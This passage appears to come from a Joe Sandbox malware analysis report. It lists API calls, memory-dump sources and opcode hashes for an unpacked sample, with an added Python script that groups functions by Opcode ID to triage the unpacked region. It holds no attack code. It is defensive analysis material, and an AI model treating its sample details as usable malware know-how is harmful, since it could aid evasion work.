• Instruction Fuzzy Hash: 10E0867860010AA7CB10FBB6DD49EAF73BC6E00B06B600566E915E3151EBA9D7088B79
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 00412691
• GetLastError.KERNEL32 ref: 0041269D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
• __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
• Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
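Reading note on the entries above, with an added example that is not part of the Joe Sandbox report. Every function listed here follows the same pattern: a kernel32 call (TlsAlloc, GetNumaHighestNodeNumber, SetThreadPriority), then GetLastError, then the Concurrency::scheduler_resource_allocation_error constructor from LIBCONCRT and __CxxThrowException@8. That is the statically linked MSVC Concurrency Runtime's error path, not sample-specific logic. The more useful signal is that several Opcode IDs (for example 66048b59... and aa1fe172...) occur twice: once in the PE-backed dump at 00400000 and once in the non-PE-backed region at 024C0000, with different Instruction IDs. Same opcode-level hash plus different instruction-level hash means the same instruction sequence with different operands, which is what the same code looks like after being copied to a new base address, consistent with the unpacking detections in the overview. The script below, written for this page and using constructed input in the report's plain-text layout, parses such entries and separates functions shared between the two dumps from those unique to the on-disk image, so an analyst can deprioritize runtime boilerplate when triaging the unpacked region. The function names and the grouping logic are this example's own.

```python
"""Correlate Joe Sandbox function entries across memory dumps by Opcode ID.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
excerpt in the report's plain-text layout (fields as the report names them).
"""
import re
from collections import defaultdict

# Constructed input: two entries sharing an Opcode ID (one per dump) and one
# entry that occurs only in the PE-backed image.
SAMPLE = """\
APIs
• TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
• GetLastError.KERNEL32 ref: 00423991
• __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
APIs
• TlsAlloc.KERNEL32(?,024D0DA0), ref: 024E3BE6
• GetLastError.KERNEL32 ref: 024E3BF8
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E3C1C
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: 02904571e3068f448a2adb13cf8600342ef3c3ecb4dba3a42be15e99bcb7cbe2
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 00412691
• GetLastError.KERNEL32 ref: 0041269D
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
"""

# "• [Part of subcall function X: ]Name.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+: )?([^\s.(]+)\.(\w+).*?ref: ([0-9A-F]+)$")
# "• Key: value" (tried only after API_RE fails, since API lines also contain a colon)
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_entries(text):
    """Split report text into one dict per function entry (each starts at 'APIs').

    API bullets are collected under 'apis' as (name, module, ref); 'Source File'
    is split into 'offset' and 'pe_backed'; other bullets become plain fields.
    """
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": []}
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section labels such as 'Similarity' or 'Yara matches'
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m.group(1), m.group(2), m.group(3)))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                parts = [p.strip() for p in val.split(",")]
                cur["offset"] = parts[1].split(":")[1].strip()
                cur["pe_backed"] = parts[2].endswith("true")
            else:
                cur[key] = val
    return entries


def api_chain(entry):
    """Ordered API names of one entry, e.g. the ConcRT error path."""
    return [name for name, _module, _ref in entry["apis"]]


def shared_with_unpacked(entries):
    """Opcode IDs seen in both a PE-backed dump and a non-PE-backed region.

    Returns {opcode_id: (sorted PE-backed offsets, sorted non-PE offsets)}.
    Same Opcode ID with different Instruction IDs is the same instruction
    sequence with different operands: the same code relocated to a new base.
    """
    groups = defaultdict(list)
    for e in entries:
        if "Opcode ID" in e and "pe_backed" in e:
            groups[e["Opcode ID"]].append(e)
    shared = {}
    for oid, group in groups.items():
        backed = sorted({e["offset"] for e in group if e["pe_backed"]})
        unbacked = sorted({e["offset"] for e in group if not e["pe_backed"]})
        if backed and unbacked:
            shared[oid] = (backed, unbacked)
    return shared


def unique_to_pe(entries):
    """Opcode IDs that appear only in the PE-backed image (triage candidates)."""
    shared = shared_with_unpacked(entries)
    return sorted({e["Opcode ID"] for e in entries
                   if e.get("pe_backed") and "Opcode ID" in e and e["Opcode ID"] not in shared})


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for oid, (pe, unp) in shared_with_unpacked(parsed).items():
        print(f"shared   {oid[:16]}... PE@{pe} unpacked@{unp}")
    for oid in unique_to_pe(parsed):
        print(f"PE-only  {oid[:16]}...")
```

To run it against a real report, replace SAMPLE with the text of the function-entry section as exported from the report (the script only needs the bullet lines and the 'APIs' separators). Opcode ID is used for grouping because it ignores operand values; Instruction ID would treat the relocated copy as a different function.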
APIs
• TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
• GetLastError.KERNEL32 ref: 024D2904
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D291A
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2928
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: ffb71400c590614d438e3b0c0ec50f2094892fbde1828a2bbec055433c675308
• Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction Fuzzy Hash: 76E0863460010967DF14FF72CD05BBB37AC7F00745B500966FC15D20A1EB76D1048A98
APIs
• TlsSetValue.KERNEL32(?,00000000,024D7BD8,00000000,?,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29BE
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024D29CA
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D29E0
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D29EE
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
• API String ID: 1964976909-0
• Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction ID: 831fb25a63ebcbc694f7501391d7b1f5e527aae6e41b028b5350b1b541343898
• Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction Fuzzy Hash: 09E086342001096BDF10FF71CC08BBF376C6F00745B500966FD19D20A1EB76D1149AA8
APIs
• TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• GetLastError.KERNEL32 ref: 00412705
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3103352999-0
• Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
• Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
APIs
• TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
• GetLastError.KERNEL32 ref: 024D296C
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2982
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2990
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3103352999-0
• Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction ID: e1d80c824b98b0671147d1b610b0e9e8808907467c2d582b7aa7e6a49ac86936
• Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction Fuzzy Hash: 2CE0C230100105678B14FBB99C48A7B32A86A01716B600B6BF871E30E1EBA9D1084AA8
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
• Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024FB32B,?,00000050,?,?,?,?,?), ref: 024FB1AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID:
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction ID: 6dc8561be9c3b197c987c549b32d6757210d39e4635540fdf6410c5b1cc622e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD21A762A00105A6EBB68F54CF01797725AEBCABDDF4A8126EB09D7304E732D941C390
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                    • String ID: image/png
                                                                                                                                                                                                                                                                    • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                    • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                    • String ID: F@
                                                                                                                                                                                                                                                                    • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
• __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
• Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
Strings
• Access violation - no RTTI data!, xrefs: 00428D7A
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
• String ID: Access violation - no RTTI data!
• API String ID: 2053020834-2158758863
• Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
• Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
• Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
• Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

APIs
• Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ContextInternal$BaseBase::~Concurrency::details::
• String ID: zB$~B
• API String ID: 3275300208-395995950
• Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
• Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
• Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
• Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
• __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pThreadProxy
• API String ID: 1687795959-3651400591
• Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
• Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
• Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
• Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
• GetLastError.KERNEL32 ref: 0042AF2E
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
• Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
• Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
• Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024C2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024C2AAD,00000000), ref: 024EB187
• GetLastError.KERNEL32 ref: 024EB195
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,024C2AAD,00000000), ref: 024EB1F0
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
• Instruction ID: 889a65bff22dee2e63644321748b22c7b6246e322cde52ba5ac680d0d7812a25
• Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
• Instruction Fuzzy Hash: 3941EB31A04216AFEF219F65CC4877FB7A5FF4176AF14416AEC5A5B2A0D7308901CB51

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 40%
Signature Coverage: 18.6%
Total number of Nodes: 70
Total number of Limit Nodes: 4

